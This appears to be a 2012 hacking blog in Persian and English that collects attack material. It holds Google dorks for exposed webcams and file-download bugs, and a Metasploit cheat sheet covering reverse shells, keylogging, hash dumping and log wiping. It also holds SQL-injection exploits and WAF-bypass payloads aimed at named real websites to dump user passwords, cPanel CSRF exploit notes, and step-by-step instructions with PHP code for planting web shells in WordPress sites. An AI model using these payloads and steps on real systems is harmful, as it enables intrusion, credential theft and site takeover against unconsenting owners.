(Internet Security Server (ISS – این محصول بسیار پر كاربرد است و بسیاری از شركت های انجام دهنده تست نفوذ از آن برای شناسایی آسیب پذیری ها استفاده می كنند.
CyberCop – این ابزار نیز برای پویش آسیب پذیری ها به كار می رود.
Phonesweep - ابزاری برای بررسی مودم سیستم های رومیزی است كه برای جواب دهی اتوماتیك و یا اجرای نرم افزار از راه دور به كار می روند.
به غیر از موارد ذكر شده در بالا ابزارهایی نیز برای تشخیص نفوذ و مدیریت داده های تولید شده در روند تشخیص نفوذ وجود دارند. البته مبحث تشخیص نفوذ با اینكه مرتبط با تست نفوذ است ولی نیازمند بررسی جداگانه و مفصلی است و لذا از آوردن ابزارهای مرتبط با آن خودداری كرده ایم.
بعد از انتخاب ابزارهای ارزیابی آسیب پذیری، باید از آنها بر روی سیستم ها و شبكه استفاده كرد. اطلاعاتی كه از ابزارهای فوق به دست می آید، به روشنی آسیب پذیری های اصلی را مشخص می كنند. در این مرحله لازم است با توجه به نوع نفوذ، كاری انجام داد تا وجود آسیب پذیری را به اثبات رساند. برای مثال باید فایلی را در منطقه كنترل شده قرار داد و یا كلمه عبور مربوط به نام كاربری مهمان را تغییر داد. همچنین در موارد دسترسی های فیزیكی باید بخشی از پرونده ای را برداشت و یا در شبیه سازی حملات مهندسی اجتماعی می توان به شماره تلفن منزل مدیر سیستم دسترسی پیدا كرد.
در این مرحله برخی از حملات مانند حملات تزریق SQL، XSS، سرریز بافر و تروجان ها نیز بر روی شبكه شبیه سازی می شوند.
پاكسازی
در این مرحله تمام فایل هایی كه در حین تست نفوذ انجام شده اند پاك شده و تمام تنظیمات و یا پارامترهایی كه تغییر یافته اند به حالت اولیه باز می گردند. همچنین تمام ردپاها پاك شده و تمام سیستم هایی كه به آنها نفوذ شده است به حالت پیش از تست نفوذ بر می گردند.
dork bara webcam
"inurl:/view.index.shtml"
"inurl:/view.index.shtml"
inurl:/view.shtml intitle:”Live View / - AXIS” | inurl:view/view.shtml^ inurl:ViewerFrame?Mode= inurl:ViewerFrame?Mode=Refresh inurl:axis-cgi/jpg inurl:axis-cgi/mjpg (motion-JPEG) inurl:view/indexFrame.shtml inurl:view/index.shtml inurl:view/view.shtml liveapplet intitle:”live view” intitle:axis intitle:liveapplet allintitle:”Network Camera NetworkCamera” intitle:axis intitle:”video server” intitle:liveapplet inurl:LvAppl intitle:”EvoCam” inurl:”webcam.html” intitle:”Live NetSnap Cam-Server feed” intitle:”Live View / - AXIS” intitle:”Live View / - AXIS 206M” intitle:”Live View / - AXIS 206W” intitle:”Live View / - AXIS 210″ inurl:indexFrame.shtml Axis inurl:”MultiCameraFrame?Mode=Motion” intitle:start inurl:cgistart intitle:”WJ-NT104 Main Page” intext:”MOBOTIX M1″ intext:”Open Menu” intext:”MOBOTIX M10″ intext:”Open Menu” intext:”MOBOTIX D10″ intext:”Open Menu” intitle:snc-z20 inurl:home/ intitle:snc-cs3 inurl:home/ intitle:snc-rz30 inurl:home/ intitle:”sony network camera snc-p1″ intitle:”sony network camera snc-m1″ site:.viewnetcam.com -www.viewnetcam.com intitle:”Toshiba Network Camera” user login intitle:”netcam live image” intitle:”i-Catcher Console - Web Monitor”
Saturday, July 14, 2012
Thursday, July 12, 2012
REFRENCE METASPOIT
- This is a reference for the most frequently used commands and syntax within Metasploit’s various interfaces and utilities.
- MSFconsole Commands:
- Select All
- Code:
- show exploits
- Show all exploits within the Framework.
- Select All
- Code:
- show payloads
- Show all payloads within the Framework.
- Select All
- Code:
- show auxiliary
- Show all auxiliary modules within the Framework.
- Select All
- Code:
- search name
- Search for exploits or modules within the Framework.
- Select All
- Code:
- info
- Load information about a specific exploit or module.
- Select All
- Code:
- use name
- Load an exploit or module (example: use windows/smb/psexec).
- Select All
- Code:
- LHOST
- Your local host’s IP address reachable by the target, often the public IP address when not on a local network. Typically used for reverse shells.
- Select All
- Code:
- RHOST
- The remote host or the target.
- Select All
- Code:
- set function
- Set a specific value (for example, LHOST or RHOST).
- Select All
- Code:
- setg function
- Set a specific value globally (for example, LHOST or RHOST).
- Select All
- Code:
- show options
- Show the options available for a module or exploit.
- Select All
- Code:
- show targets
- Show the platforms supported by the exploit.
- Select All
- Code:
- set target num
- Specify a specific target index if you know the OS and service pack.
- Select All
- Code:
- set payload payload
- Specify the payload to use.
- Select All
- Code:
- show advanced
- Show advanced options.
- Select All
- Code:
- set autorunscript migrate -f
- Automatically migrate to a separate process upon exploit completion.
- Select All
- Code:
- check
- Determine whether a target is vulnerable to an attack.
- Select All
- Code:
- exploit
- Execute the module or exploit and attack the target.exploit -j
- Run the exploit under the context of the job. (This will run the exploit in the background.)
- Select All
- Code:
- exploit -z
- Do not interact with the session after successful exploitation.
- Select All
- Code:
- exploit -e encoder
- Specify the payload encoder to use (example: exploit –e shikata_ga_nai).
- Select All
- Code:
- exploit -h
- Display help for the exploit command.
- Select All
- Code:
- sessions -l
- List available sessions (used when handling multiple shells).
- Select All
- Code:
- sessions -l -v
- List all available sessions and show verbose fields, such as which vulnerability was used when exploiting the system.
- Select All
- Code:
- sessions -s script
- Run a specific Meterpreter script on all Meterpreter live sessions.
- Select All
- Code:
- sessions -K
- Kill all live sessions.
- Select All
- Code:
- sessions -c cmd
- Execute a command on all live Meterpreter sessions.
- Select All
- Code:
- sessions -u sessionID
- Upgrade a normal Win32 shell to a Meterpreter console.
- Select All
- Code:
- db_create name
- Create a database to use with database-driven attacks (example: db_create autopwn).
- Select All
- Code:
- db_connect name
- Create and connect to a database for driven attacks (example: db_connect autopwn).
- Select All
- Code:
- db_nmap
- Use nmap and place results in database. (Normal nmap syntax is supported, such as –sT –v –P0.)
- Select All
- Code:
- db_autopwn -h
- Display help for using db_autopwn.
- Select All
- Code:
- db_autopwn -p -r -e
- Run db_autopwn against all ports found, use a reverse shell, and exploit all systems.
- Select All
- Code:
- db_destroy
- Delete the current database.
- Select All
- Code:
- db_destroy user:password@host:port/database
- Delete database using advanced options.
- Meterpreter Commands help:
- Open Meterpreter usage help.
- Select All
- Code:
- run scriptname
- Run Meterpreter-based scripts; for a full list check the scripts/meterpreter directory.
- Select All
- Code:
- sysinfo
- Show the system information on the compromised target.
- Select All
- Code:
- ls
- List the files and folders on the target.
- Select All
- Code:
- use priv
- Load the privilege extension for extended Meterpreter libraries.
- Select All
- Code:
- ps
- Show all running processes and which accounts are associated with each process.
- Select All
- Code:
- migrate PID
- Migrate to the specific process ID (PID is the target process ID gained from the ps command).
- Select All
- Code:
- use incognito
- Load incognito functions. (Used for token stealing and impersonation on a target machine.)
- Select All
- Code:
- list_tokens -u
- List available tokens on the target by user.
- Select All
- Code:
- list_tokens -g
- List available tokens on the target by group.
- Select All
- Code:
- impersonate_token DOMAIN_NAME\\USERNAME
- Impersonate a token available on the target.
- Select All
- Code:
- steal_token PID
- Steal the tokens available for a given process and impersonate that token.drop_token Stop impersonating the current token.
- Select All
- Code:
- getsystem
- Attempt to elevate permissions to SYSTEM-level access through multiple attack vectors.
- Select All
- Code:
- shell
- Drop into an interactive shell with all available tokens.
- Select All
- Code:
- execute -f cmd.exe -i
- Execute cmd.exe and interact with it.
- Select All
- Code:
- execute -f cmd.exe -i -t
- Execute cmd.exe with all available tokens.
- Select All
- Code:
- execute -f cmd.exe -i -H -t
- Execute cmd.exe with all available tokens and make it a hidden process.
- Select All
- Code:
- rev2self
- Revert back to the original user you used to compromise the target.
- Select All
- Code:
- reg command
- Interact, create, delete, query, set, and much more in the target’s registry.
- Select All
- Code:
- setdesktop number
- Switch to a different screen based on who is logged in.
- Select All
- Code:
- screenshot
- Take a screenshot of the target’s screen.
- Select All
- Code:
- upload file
- Upload a file to the target.
- Select All
- Code:
- download file
- Download a file from the target.
- Select All
- Code:
- keyscan_start
- Start sniffing keystrokes on the remote target.
- Select All
- Code:
- keyscan_dump
- Dump the remote keys captured on the target.
- Select All
- Code:
- keyscan_stop
- Stop sniffing keystrokes on the remote target.
- Select All
- Code:
- getprivs
- Get as many privileges as possible on the target.
- Select All
- Code:
- uictl enable keyboard/mouse
- Take control of the keyboard and/or mouse.
- Select All
- Code:
- background
- Run your current Meterpreter shell in the background.
- Select All
- Code:
- hashdump
- Dump all hashes on the target.
- Select All
- Code:
- use sniffer
- Load the sniffer module.
- Select All
- Code:
- sniffer_interfaces
- List the available interfaces on the target.
- Select All
- Code:
- sniffer_dump interfaceID pcapname
- Start sniffing on the remote target.
- Select All
- Code:
- sniffer_start interfaceID packet-buffer
- Start sniffing with a specific range for a packet buffer.
- Select All
- Code:
- sniffer_stats interfaceID
- Grab statistical information from the interface you are sniffing.
- Select All
- Code:
- sniffer_stop interfaceID
- Stop the sniffer.
- Select All
- Code:
- add_user username password -h ip
- Add a user on the remote target.
- Select All
- Code:
- add_group_user "Domain Admins" username -h ip
- Add a username to the Domain Administrators group on the remote target.
- Select All
- Code:
- clearev
- Clear the event log on the target machine.
- Select All
- Code:
- timestomp
- Change file attributes, such as creation date (antiforensics measure).
- Select All
- Code:
- reboot
- Reboot the target machine.
- MSFpayload Commands:
- Select All
- Code:
- msfpayload -h
- List available payloads.
- Select All
- Code:
- msfpayload windows/meterpreter/bind_tcp O
- List available options for the windows/meterpreter/bind_tcp payload (all of these can use any payload).
- Select All
- Code:
- msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X > payload.exe
- Create a Meterpreter reverse_tcp payload to connect back to 192.168.1.5 and on port 443, and then save it as a Windows Portable Executable named payload.exe.
- Select All
- Code:
- msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R > payload.raw
- Same as above, but export as raw format. This will be used later in msfencode
- Select All
- Code:
- msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
- Same as above but export as C-formatted shellcode.
- Select All
- Code:
- msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
- Export as %u encoded JavaScript.
- MSFencode Commands:
- Select All
- Code:
- msfencode -h
- Display the msfencode help.
- Select All
- Code:
- msfencode -l
- List the available encoders.
- Select All
- Code:
- msfencode -t (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
- Format to display the encoded buffer.
- Select All
- Code:
- msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe
- Encode payload.raw with shikata_ga_nai five times and export it to an output file named encoded_payload.exe.
- Select All
- Code:
- msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -e x86/ _countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
- Create a multi-encoded payload.
- Select All
- Code:
- msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
- Create pure alphanumeric shellcode where ESI points to the shellcode; output in C-style notation.
- MSFcli Commands:
- Select All
- Code:
- msfcli | grep exploit
- Show only exploits.
- Select All
- Code:
- msfcli | grep exploit/windows
- Show only Windows exploits.
- Select All
- Code:
- msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E
- Launch ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload being delivered to listen on port 443.
BUG LFD DORK
inurl:"download.php?file="inurl:"download.php?src="inurl:"download.php?url="inurl:"download.php?f="inurl:"download.php?book_file="inurl:"download.php?di_key="inurl:"download.php?path="inurl:"download.php?dfile="inurl:"download.php?get="inurl:"download.php?u="inurl:"dl.php?file="inurl:"down.php?dd="inurl:"down.php?name="inurl:"down.php?downfile"inurl:"down.php?arq="inurl:"file.php?src="inurl:"download.php?downloadFile"inurl:"download.php?page="
Wednesday, July 11, 2012
[+] Exploit Title : Word Press image-gallery plugin Sql Injection
[+] Google Dork : inurl:image-gallery/?gallery_id=
[+] Autor : Mr.XpR
[+] Download : http://wordpress.org
[+] Contact : No0PM@yahoo.com
[+] Researcher Team : IRaNHaCK Security Team
[+] Bug Level : High (Sql)
[+] Test : 7 , Linux Back Track
##################################################################
[+]Exploit
[-] http://Site.Com/[Patch]image-gallery/?gallery_id=[Sqli]
[+]Inject
[-]
http://www.ucanews.com/image-gallery/?gallery_id=999+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5
,6+from+uca_users
[+]Login
[-] http://www.ucanews.com/wp-login.php
[+]Example :
[-]
http://www.ucanews.com/image-gallery/?gallery_id=999+union+select+1,group_concat%28user_login,0x3a,user_pass%29,3,4,5
,6+from+uca_users
[-] More In Google ...
Cpanel 11.X Multiple CSRF Vulnerability
====================================================================
save these codes as a .htm or .html page and then run in ur browser
note 1 :
write ur target's ip instead of
IP " in ur html page"
__________________
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.cpanel.net/
.:. Gr34T$ T0 [aboud-el]
####################################################################
===[ Exploit ]===
Add File
========
Ur File Name
Rename File
===========
Delete File
============
File Name Delete
Add Folder
===========
Ur Folder Name
Rename Folder
=============
New Name
Delete Folder
=============
Folder Name Delete
####################################################################
# 1337day.com [2012-05-26]
====================================================================
save these codes as a .htm or .html page and then run in ur browser
note 1 :
write ur target's ip instead of
IP " in ur html page"
__________________
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.cpanel.net/
.:. Gr34T$ T0 [aboud-el]
####################################################################
===[ Exploit ]===
Add File
========
Ur File Name
Rename File
===========
Delete File
============
File Name Delete
Add Folder
===========
Ur Folder Name
Rename Folder
=============
New Name
Delete Folder
=============
Folder Name Delete
####################################################################
# 1337day.com [2012-05-26]
آپلود شل در ورد پرس
http://ashiyane.org/forums/showthread.php?threadid=74501
دوست عزیز 2 روش معمول داریم :
1- برو تو قسمت ادیت قالب بعد از اونجا index.phpیا همونmain.phpرو انتخاب کن از سمت راست بهد کد اون صفحه رو کات کن در یک نوت پد بعد کد یک شلر رو بریز جاش و ذخیره کن بعد برو سایت باز کن میبینی شلت ران شد
2- میتونی یک افزونه وردپرس دانلود کنی بعد یک شل در فایل فشرده افزونه جا بدی بعد از قسمت افزودن افزونه افزونه رو نصب کنی خوب العان شل کجاست اینجا :
http://ashiyane.org/forums/showthread.php?threadid=74501
دوست عزیز 2 روش معمول داریم :
1- برو تو قسمت ادیت قالب بعد از اونجا index.phpیا همونmain.phpرو انتخاب کن از سمت راست بهد کد اون صفحه رو کات کن در یک نوت پد بعد کد یک شلر رو بریز جاش و ذخیره کن بعد برو سایت باز کن میبینی شلت ران شد
2- میتونی یک افزونه وردپرس دانلود کنی بعد یک شل در فایل فشرده افزونه جا بدی بعد از قسمت افزودن افزونه افزونه رو نصب کنی خوب العان شل کجاست اینجا :
site.com/wp-content/plugins/اسم افزونه شما/shell.phpدوست عزیز شما برو قسمت editor و توی یکی از فایل های php کد زیر رو اضافه کن بعد پیج رو بالا بیار
کد PHP:
if(isset($_POST['Submit'])){
$filedir = "";
$maxfile = '2000000';
$userfile_name = $_FILES['image']['name'];
$userfile_tmp = $_FILES['image']['tmp_name'];
if (isset($_FILES['image']['name'])) {
$abod = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $abod);
echo"Done = $userfile_name ";
}
}
else{
echo'
;
}?>
اول این دورکش :
intitle:"News list Administration panel"
or
"Simple PHP Newsletter"
or
"WESPA PHP Newsletter v3.0"
خوب حالا وقتی سایت مورد نظر را پیدا کردید به اینجا میرید :
target.com/newsletter/admin.php
or
target.com/mailer/admin.php
حالا admin.php رو پاک کرده و اینو جاش بنویسید :
/install/install1.php
خوب الان شما میتونید رمز رو عوض کنید .
فقط وقتی سوال کرد از my sql میخواهید استفاده کنید؟ شما no بزنید .
http://packetstormsecurity.org/files/99841/simplephpnewsletter-admin.txt
exploit by viper hacker
to system hasta daram va kheily ok hast
سلام امروز میخوام یه باگ جدید بهتون معرفی کنم که باهاش در کمتر از 2 دقیقه سایتهایی را که این باگ را دارا هستند هک کنید
1.برای یافتن victim در گوگل جمله ی مقابل را سرچ کنید : Powered by eLitius version 1.0
2.سپس یک سایت را به عنوان victim انتخاب کنید (دقت کنید که با سایت هایی که در باره ی این جمله توضیح داده اند اشتباه نشود)
3.لینک سایت را کپی کرده و به جای Your Victim که در اکسپولیتی که برایتان پیوست کردم قرار دهید
و فقط سایت را با پسوند کپی کنید بدون www و //:http مثلا : victim.com
اکسپولیت : expolit by Viper Hacker
4.اکسپولیت را با پسوند html ذخیره کنید
5.اکسپولیتی را که با پسوند html ذخیره کردید را باز کنید و روی save کلیک کنید
6.اگر یک صفحه ی لوگین باز شد که با وارد کردن کلمه ی admin در کادر های username و password میتوانید مدیریت سایت را بر عهده بگیرید و اگر ارور داد باید در اکسپولیت بعد از کلمه ی affiliate یک s قرار دهید
این هم یک mr-pctech.com :victim که برای این victim باید بعد از affiliate حرف s را قرار دهید(در اکسپولیت)
اگر در این مورد سوال داشتید به ایمیلم پیام بدید
ali.viper76@yahoo.com
to system hasta daram va kheily ok hast
سلام امروز میخوام یه باگ جدید بهتون معرفی کنم که باهاش در کمتر از 2 دقیقه سایتهایی را که این باگ را دارا هستند هک کنید
1.برای یافتن victim در گوگل جمله ی مقابل را سرچ کنید : Powered by eLitius version 1.0
2.سپس یک سایت را به عنوان victim انتخاب کنید (دقت کنید که با سایت هایی که در باره ی این جمله توضیح داده اند اشتباه نشود)
3.لینک سایت را کپی کرده و به جای Your Victim که در اکسپولیتی که برایتان پیوست کردم قرار دهید
و فقط سایت را با پسوند کپی کنید بدون www و //:http مثلا : victim.com
اکسپولیت : expolit by Viper Hacker
4.اکسپولیت را با پسوند html ذخیره کنید
5.اکسپولیتی را که با پسوند html ذخیره کردید را باز کنید و روی save کلیک کنید
6.اگر یک صفحه ی لوگین باز شد که با وارد کردن کلمه ی admin در کادر های username و password میتوانید مدیریت سایت را بر عهده بگیرید و اگر ارور داد باید در اکسپولیت بعد از کلمه ی affiliate یک s قرار دهید
این هم یک mr-pctech.com :victim که برای این victim باید بعد از affiliate حرف s را قرار دهید(در اکسپولیت)
اگر در این مورد سوال داشتید به ایمیلم پیام بدید
ali.viper76@yahoo.com
BY PASS HAYE SQL INJECTION
answer=-999/**/union/**/select all 1,2,table_name,4,5,6,7,8,9,10,11,12/**/from/**/information_schema.tables --
answer=-999/**/union/**/select all 1,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12/**/from/**/information_schema.tables --
jaye union
/*!UniON*/**/SeLeCT+1,2,3,4,5,6,7,8,9,10,11,12,13--
uni*on+sel*ect+1,2,3,4,5,6,7,8,9,10,11,12,13--
UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,4,5,6,7,8,9,10,11,12,13--
/*!UniON*/+aLl+/*!sELECt*/+1,2,3,4,5,6,7,8,9,10,11,12,13
answer=-999/**/union/**/select all 1,2,table_name,4,5,6,7,8,9,10,11,12/**/from/**/information_schema.tables --
union all select 1,table_name,3 from information_schema.tables/*
/union /*!select*/ 1,concat_ws(0x7c,table_name),3,4,5,6 from information_schema./*!tables*/ where table_schema=database()-- -
http://www.digitalflywheel.com/case.php?id=-4+union%20select%201,2,3,4,5,6,7,8,concat_ws%280x3a,username,0x3a,password%29+from+users+limit+1,1
http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,13,14,15,16,17,18+from+information_schema.columns--
http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,4,5,6,7,8,9,10,11,concat%28table_name,0x3a3a,column_name%29,13,14,15,16,17,18+from+information_schema.columns--
http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,group_concat%28table_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables--
http://www.gretchen-club.de/detail.php?id=-101+union+select+1,2,3,group_concat%28column_name%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.columns+where+table_name=CHAR%28108,%20111,%20103,%20105,%20110%29
http://www.espaciologopedico.com/recursos/glosariodet.php?Id=-1+union+select+1,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR%28117,%20115,%20101,%20114%29
http://www.espaciologopedico.com/recursos/glosariodet.php?Id=-1+union+select+1,concat%28table_name,0x3a,column_name,0x3a,table_schema%29,3,4,5+from+information_schema.columns+where+column_name+LIKE+CHAR%28117,%20115,%20101,%20114%29+limit+2,5--
http://www.espaciologopedico.com/recursos/glosariodet.php?Id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+1+offset+100--
answer=-999/**/union/**/select all 1,2,unhex(hex(table_name)),4,5,6,7,8,9,10,11,12/**/from/**/information_schema.tables --
jaye union
%75%6E%69%6F%6E
/*!UniON*/**/SeLeCT+1,2,3,4,5,6,7,8,9,10,11,12,13--
uni*on+sel*ect+1,2,3,4,5,6,7,8,9,10,11,12,13--
UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,4,5,6,7,8,9,10,11,12,13--
/*!UniON*/+aLl+/*!sELECt*/+1,2,3,4,5,6,7,8,9,10,11,12,13
http://www.hasharat.co.il/html/artist.php?id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,group_concat%28table_name%29,6,7,8,9+from%20information_schema.tables+where+table_schema=0x6861736861726174--
http://www.hasharat.co.il/html/artist.php?id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,group_concat%28column_name%29,6,7,8,9+from%20information_schema.columns+where+table_name=0x7573657273--
http://www.hasharat.co.il/html/artist.php?id=-999.9%20UNION%20ALL%20SELECT%201,2,3,4,group_concat%28id,0x3a,nick,0x3a,password,0x3a,email%29,6,7,8,9+from+users--
Monday, July 9, 2012
marbot b mosabeghe 2 k bayad motale shavad
http://ashiyane.org/forums/showthread.php?t=72669
http://ashiyane.org/forums/showthread.php?t=72666
http://ashiyane.org/forums/showthread.php?t=61950
http://ashiyane.org/forums/showthread.php?t=72669
http://ashiyane.org/forums/showthread.php?t=72666
http://ashiyane.org/forums/showthread.php?t=61950
Subscribe to:
Posts (Atom)